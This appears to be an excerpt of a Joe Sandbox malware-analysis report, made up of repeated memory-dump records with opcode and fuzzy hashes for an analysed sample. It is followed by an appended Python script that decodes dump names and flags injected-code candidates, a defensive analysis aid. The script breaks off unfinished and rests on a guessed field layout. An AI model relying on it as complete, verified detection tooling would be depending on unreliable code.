                                  • Snapshot File: hcaresult_14_2_2aa0000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: LRjq
                                  • API String ID: 0-665714880
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3233119337.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_2aa0000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3233119337.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_2aa0000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3233119337.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_2aa0000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3233119337.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_2aa0000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3233119337.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_2aa0000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3233119337.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_2aa0000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3233119337.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_2aa0000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3233119337.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_2aa0000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3233119337.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_2aa0000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3233119337.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_2aa0000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3233119337.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_2aa0000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 74f8b02d70a0acb215d24abdcfc38ca0c3e463d6f0307d145693ac85424d0c06
                                  • Instruction ID: 47d030341a1b3df90f3e29fd5df4f8512de5c641c609e09a6f9d0575a873cac2
                                  • Opcode Fuzzy Hash: 74f8b02d70a0acb215d24abdcfc38ca0c3e463d6f0307d145693ac85424d0c06
                                  • Instruction Fuzzy Hash: 86416F34F002068BDF649FA9D6E077FB766EF89610F20482AD51ADB394DB35DC418B92
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3233119337.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_2aa0000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 06991ce15e5c56c7926f87388fe7c74ef058a76b30510773b78132afdb89036e
                                  • Instruction ID: a0db262d677969e1036664d9df116de477d4cdeec560e0f1690340a42c3177f1
                                  • Opcode Fuzzy Hash: 06991ce15e5c56c7926f87388fe7c74ef058a76b30510773b78132afdb89036e
                                  • Instruction Fuzzy Hash: 635124796821458FCB19FFA9F985E583F76FB923057008A69D0008B2BDDB30691FCB40
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3233119337.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_2aa0000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b4be4a935cacc0cb33bd3730a9b85ab93368cdf78e4681b20ed0619985b7a0fc
                                  • Instruction ID: 4cd16b4d7fbb1649c47b513a78d5d951050c04dadb0b2a470c04126a5e20fb79
                                  • Opcode Fuzzy Hash: b4be4a935cacc0cb33bd3730a9b85ab93368cdf78e4681b20ed0619985b7a0fc
                                  • Instruction Fuzzy Hash: 7F51E3796821459FCB19FFA9F985E683F76FB923057004A69D0048B2BDDB70691FCB80
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3233119337.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_2aa0000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a809b25cce3932c570480790e23e11306f6015550dfd706b977156d85db1d79a
                                  • Instruction ID: 4e28893f5beac63f00c469d1f3409c0121c3478a4c1aecdd3a06ec7e9a1c695b
                                  • Opcode Fuzzy Hash: a809b25cce3932c570480790e23e11306f6015550dfd706b977156d85db1d79a
                                  • Instruction Fuzzy Hash: A0316935E102059FCB19CFA4D9A46AEB7B2FF89310F10C929E816E7754EB75A842CB50
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3233119337.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_2aa0000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b7c7ba3a3742f926afd88b0395b31b6081c8cbe064c01577b613dd6f99d939af
                                  • Instruction ID: 4e69af6068b204c0ada1602aacc85c2474282d4d6862c734497aed06c168d33b
                                  • Opcode Fuzzy Hash: b7c7ba3a3742f926afd88b0395b31b6081c8cbe064c01577b613dd6f99d939af
                                  • Instruction Fuzzy Hash: B841FEB4D00349DFDB10CFA9C990ADEBFB5FF48314F24802AE819AB254DB75A945CB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3233119337.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_2aa0000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 91529fe7f48f698fd0eb999bee3877845ed853b32e7a3c0625fec3bd27adff21
                                  • Instruction ID: 3ed6f49a1bd45e4255e2474c6966fe12373771bbf56ee5a7c82f104046967ffe
                                  • Opcode Fuzzy Hash: 91529fe7f48f698fd0eb999bee3877845ed853b32e7a3c0625fec3bd27adff21
                                  • Instruction Fuzzy Hash: FE312938E00215CFDB24EB68CAA56AE77F2EF89344F500568D506AB3A4DF36DC45CB94
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3233119337.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_2aa0000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 80fe94c8555248d7cf48d74264d8f9890713cf8f546ce6aced84c601944d3c09
                                  • Instruction ID: 4688c0062d36b43802482ff2d4dff8c8762a014d50de37f71fb183c788c7a605
                                  • Opcode Fuzzy Hash: 80fe94c8555248d7cf48d74264d8f9890713cf8f546ce6aced84c601944d3c09
                                  • Instruction Fuzzy Hash: E5314B35E102059FCB19CFA4D5A46AEB7B2EF89310F10C929E816E7754DF75AC42CB50
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3233119337.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_2aa0000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2c2edbe63958322be840f017ab0db483e62a9c7512716e9d849f97a9351eb603
                                  • Instruction ID: 5a135af15044cb7e108280309170bbfa054613aaa85122fad6d2e4fd9e2981c4
                                  • Opcode Fuzzy Hash: 2c2edbe63958322be840f017ab0db483e62a9c7512716e9d849f97a9351eb603
                                  • Instruction Fuzzy Hash: 9C41EBB0D00249DFDB14DFA9C994ADEBFB5FF48310F24802AE819AB254DB75A945CB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3233119337.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_2aa0000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8095556d7de0a41b7bbdb52a80cc3f5886c8d335787e94c8d25bf4dd50081a2c
                                  • Instruction ID: 5b7c6f7f487482ec7a20e29416c4d182577968642900339c66def6547065a01e
                                  • Opcode Fuzzy Hash: 8095556d7de0a41b7bbdb52a80cc3f5886c8d335787e94c8d25bf4dd50081a2c
                                  • Instruction Fuzzy Hash: 9B312738E00215CFDB28EB74C6656AE77B2EF89344F500568D406AB3A4DF36DC45CB98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3233119337.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_2aa0000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2d9f91ed2156a98b20e68c8287cfa47d44c809180d147105f2a79f55104d20ee
                                  • Instruction ID: ae8dbcb1e84c64892ae09fd17311d15928481c65c7465a5e0560222351c21aaf
                                  • Opcode Fuzzy Hash: 2d9f91ed2156a98b20e68c8287cfa47d44c809180d147105f2a79f55104d20ee
                                  • Instruction Fuzzy Hash: 3B31AC30E1020A9BCB05CFA8D9907AFFBB6FF89310F50C529E805EB255DB719846CB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3233119337.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_2aa0000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 158583ac47da19cf079378eb2ce889b57fb1f3124dd6af469005152b1ff16770
                                  • Instruction ID: 3e6d880eaa915b4c36f0da087b2d2ae18039b4041b10f39960de41799bfac102
                                  • Opcode Fuzzy Hash: 158583ac47da19cf079378eb2ce889b57fb1f3124dd6af469005152b1ff16770
                                  • Instruction Fuzzy Hash: C6218D34E1020A9BDB05CFA4D59079FF7B6FF89310F10C629E805EB255DB719846CB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3233119337.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_2aa0000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 01c9b6237c5b3e37aa234d38570344779a76da748af9b25986e0c98b6180a355
                                  • Instruction ID: 9033482150a4ea8f5e03eb89aaaf37995f33f23a731468a8975535b555d4f0e6
                                  • Opcode Fuzzy Hash: 01c9b6237c5b3e37aa234d38570344779a76da748af9b25986e0c98b6180a355
                                  • Instruction Fuzzy Hash: 542145786101019FDF16EBA8F9D4B6D3769EF85314F105925D00ACB2A9EF38DC46CB91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3233119337.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_2aa0000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b7b32629e49dcefee2f7f18bebceb8c0b3b739d7b1140f16936dbdbb946f6375
                                  • Instruction ID: fa855a336abac3e3495f990173b191f9d142e7cf76bed8f56b84f72ade47f094
                                  • Opcode Fuzzy Hash: b7b32629e49dcefee2f7f18bebceb8c0b3b739d7b1140f16936dbdbb946f6375
                                  • Instruction Fuzzy Hash: 48218CB8A003006FEF656B68E5E973C3B69EF42315F144869E40EC7690EF29C9868757
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3232679069.00000000028DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 028DD000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_28dd000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 777eee303b35a71fb34de68b1a1ba5d5741cd247127d2ceab543143cb5a3f0ac
                                  • Instruction ID: ca010979fa7fc8aae48def13a7520a0a265e0d44223bb3f7e4ca0a2f3d18e3a4
                                  • Opcode Fuzzy Hash: 777eee303b35a71fb34de68b1a1ba5d5741cd247127d2ceab543143cb5a3f0ac
                                  • Instruction Fuzzy Hash: AA21D07A604204DFDB14DF24D984B26BB65EB88318F64C569D90A8B256C33AD80BCAA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3233119337.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_2aa0000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: aad827d8f4d8f2271640de32933aae1eaca090b391faf3390c55803fc22b8fd2
                                  • Instruction ID: f7ea0ab8ec2e79db5ea58cce273d9b25be2435325e3fc422d09abcbb97adc403
                                  • Opcode Fuzzy Hash: aad827d8f4d8f2271640de32933aae1eaca090b391faf3390c55803fc22b8fd2
                                  • Instruction Fuzzy Hash: 30218375E00206DBDB19CFA4D5A46EEF7B2AF49310F20892AE815FB351EF709946CB40
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3233119337.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_2aa0000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2b366d0571409feec75d5fd88afcc12e36eb31acad5b9b15617e60cab96437c4
                                  • Instruction ID: 7e5c02fc2afa6ea9b085ea0801fc82c06dcb9bde4b4a43ee598e6fb75169016e
                                  • Opcode Fuzzy Hash: 2b366d0571409feec75d5fd88afcc12e36eb31acad5b9b15617e60cab96437c4
                                  • Instruction Fuzzy Hash: 7D21F376E04340AFDB119BB8E9A565E7BF5EB48650F48082AE949C3344EB348802CB85
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3233119337.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_2aa0000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2434dc8a204882bd492aff37ffe4ada0c9e596255960d0b79bbc0c52d0e9b5a1
                                  • Instruction ID: d4980ab0925a69c03999b722eecb1e863f259f4a0bcf49814b85401085b1acc1
                                  • Opcode Fuzzy Hash: 2434dc8a204882bd492aff37ffe4ada0c9e596255960d0b79bbc0c52d0e9b5a1
                                  • Instruction Fuzzy Hash: 4B216234E0020A9BDB19CFA5D9946DFF7B2AF89310F20852AE815FB351EF719945CB50
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3233119337.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_2aa0000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: bc1faabfb8d1c055559e198d8f8e5a3fba607fb12ba6d32a33f6751ffc032e6c
                                  • Instruction ID: 68bc339c86a173a7e910b3a6cf613816c859951d7bf9ebb68fa8a2455c9f8d73
                                  • Opcode Fuzzy Hash: bc1faabfb8d1c055559e198d8f8e5a3fba607fb12ba6d32a33f6751ffc032e6c
                                  • Instruction Fuzzy Hash: E0214534B00205DFDB64EB68C6657AE77F6FF89245F100468D10AEB2A4EF369D41CBA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3233119337.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_2aa0000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8df452c7e6bc51a3cfabf2de3bdd63d8f5267f3c66eceffa42880e860bbacd0e
                                  • Instruction ID: bc02f09ba5e759a2968cc60ba0bd56fe0b5c45f5cf1576dca394dfa2b2c54799
                                  • Opcode Fuzzy Hash: 8df452c7e6bc51a3cfabf2de3bdd63d8f5267f3c66eceffa42880e860bbacd0e
                                  • Instruction Fuzzy Hash: 1A214838A00205CFCB54DB78D5A9BAD77F1EF4D305B1048A8E406EB3A0DB759D01CB94
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3233119337.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_2aa0000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 0fbfba4c2cbe8d4a14d54d658ba6e1fa396ef1d52939bf329aab7ae9ca368a0c
                                  • Instruction ID: 45495ad1455ff30a58d8b437499fbee257c8fd24990dda5b900b74d76580960e
                                  • Opcode Fuzzy Hash: 0fbfba4c2cbe8d4a14d54d658ba6e1fa396ef1d52939bf329aab7ae9ca368a0c
                                  • Instruction Fuzzy Hash: 932103346101019FDF26EB68F9D4B6D3769EF85314F105A25E00ACB2A9EF68DC4ACB91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3233119337.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_2aa0000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f856a55f838abcb350f2571ab114ba80c30254b5def7feb2c8e943f63dcbe0e9
                                  • Instruction ID: 27c6220a228b52a229f09d0a99fdf69893784692ab36fa114fa069615e73feaa
                                  • Opcode Fuzzy Hash: f856a55f838abcb350f2571ab114ba80c30254b5def7feb2c8e943f63dcbe0e9
                                  • Instruction Fuzzy Hash: C9210538A40205CFCB54EB78D5A9BAD77F2EF49705B104868E406EB3A0DF769D01CB94
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3233119337.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_2aa0000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: addd223aa25af43b4f6faca67da2a0873ec40357bff354931d8dc4f6ba7e4826
                                  • Instruction ID: 7cb8931d7a8c9ad51923ae00491347d7bb2913c1698d60ff66520f0399b7bedd
                                  • Opcode Fuzzy Hash: addd223aa25af43b4f6faca67da2a0873ec40357bff354931d8dc4f6ba7e4826
                                  • Instruction Fuzzy Hash: FE214834A00205DFDB64EB64C6657AD77F6FF49245F100469D10AEB2A4DF368D41CBA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3233119337.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_2aa0000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 0ffe3dd9c0f5bc2835c4ccb7fe254c0117c03d22731627640214a31fa0595d97
                                  • Instruction ID: 4d6264446b0c4d31c332436fafa7a8ec25f99c6c16e6342fa80b3ecccd1bd507
                                  • Opcode Fuzzy Hash: 0ffe3dd9c0f5bc2835c4ccb7fe254c0117c03d22731627640214a31fa0595d97
                                  • Instruction Fuzzy Hash: 16119130B002088FEF55ABB9D9A473A3765FF89314F51487AD406CB294DF29CC428BC6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3233119337.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_2aa0000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b28cde4e76ca3f32d2e0ef443b0a64518816a8b7b3d792f1b6e2f9e88e66b13e
                                  • Instruction ID: a72a9b528071e1c00c5c84f0fd200764a5442e928ffee797fc7f828c35bdaa60
                                  • Opcode Fuzzy Hash: b28cde4e76ca3f32d2e0ef443b0a64518816a8b7b3d792f1b6e2f9e88e66b13e
                                  • Instruction Fuzzy Hash: 3711C630B002048FEF155BB8D9A477A3765EF8A355F11487AD446CB285DF29C8468BCA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3232679069.00000000028DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 028DD000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_28dd000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 775eec5873da06adc15fb8bea61663acc563d7c3719d52a6719138802b54e8e7
                                  • Instruction ID: 47ae8f6b96d5301ebdfd499324b15e082d97e4b7cb981a14284a002a08f732d0
                                  • Opcode Fuzzy Hash: 775eec5873da06adc15fb8bea61663acc563d7c3719d52a6719138802b54e8e7
                                  • Instruction Fuzzy Hash: F42184795093C08FDB16CF24D994715BF71EB86214F28C5EAD8498F697C33A980ACB62
                                  Uniqueness

                                  Uniqueness Score: -1.00%
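
The records above all point back to two memory dumps taken from process 14 (Source File names ending in `...02AA0000...sdmp` and `...028DD000...sdmp`, neither backed by a PE file), and the Snapshot File names `hcaresult_14_2_2aa0000_...` / `hcaresult_14_2_28dd000_...` encode the same process, dump number and base address. The script below is an added example, not code from the Joe Sandbox report or from Joe Security: it decodes those identifiers, cross-checks the snapshot name against the dump name, counts the distinct Opcode IDs per region and flags regions whose footprint matches unpacked or injected code (executable, writable, private, not PE-backed). The field layout of the `.sdmp` name (`pid.dump.timestamp.base.protect.flags.type.extra`) is an assumption inferred from the visible names; the protection and memory-type constants are the standard winnt.h values; the sixth field is left undecoded. The report excerpt used as input is constructed from the records on this page.

```python
"""Decode Joe Sandbox memory-dump identifiers and flag injected-code candidates.

Added example, not part of the Joe Sandbox report. ASSUMPTION: an .sdmp name is
laid out as <pid>.<dump#>.<timestamp>.<base>.<protect>.<flags>.<type>.<extra>.sdmp,
inferred from the visible names and cross-checked against the
hcaresult_<pid>_<dump#>_<base>_... snapshot name. <flags> is not decoded.
"""
import re
from dataclasses import dataclass

# winnt.h page-protection values (low byte of MEMORY_BASIC_INFORMATION.Protect)
PROTECT_NAMES = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
EXECUTABLE = {0x10, 0x20, 0x40, 0x80}
WRITABLE = {0x04, 0x08, 0x40, 0x80}
# MEMORY_BASIC_INFORMATION.Type values
MEM_PRIVATE = 0x20000
MEM_TYPE_NAMES = {MEM_PRIVATE: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

HEX8 = r"([0-9A-Fa-f]{8})"
SDMP_RE = re.compile(
    rf"^{HEX8}\.{HEX8}\.(\d+)\.([0-9A-Fa-f]{{16}})\.{HEX8}\.{HEX8}\.{HEX8}\.{HEX8}\.sdmp$")
SNAP_RE = re.compile(r"^hcaresult_(\d+)_(\d+)_([0-9a-fA-F]+)_\w+\.jbxd$")
SOURCE_RE = re.compile(
    r"Source File:\s*(\S+\.sdmp),\s*Offset:\s*([0-9A-Fa-f]+),\s*based on PE:\s*(true|false)")


@dataclass(frozen=True)
class DumpRegion:
    pid: int         # sandbox process index (14 for the dumps on this page)
    dump: int        # dump number within that process
    base: int        # region base address
    protect: int     # raw protection field
    mem_type: int    # raw memory-type field
    pe_backed: bool  # the report's "based on PE" flag

    @property
    def protect_name(self) -> str:
        return PROTECT_NAMES.get(self.protect & 0xFF, hex(self.protect))

    @property
    def mem_type_name(self) -> str:
        return MEM_TYPE_NAMES.get(self.mem_type, hex(self.mem_type))

    def is_injected_code_candidate(self) -> bool:
        """RWX private memory not backed by a PE file: the usual footprint of an
        in-memory unpacked or injected payload rather than a loaded module."""
        p = self.protect & 0xFF
        return p in EXECUTABLE and p in WRITABLE and self.mem_type == MEM_PRIVATE and not self.pe_backed


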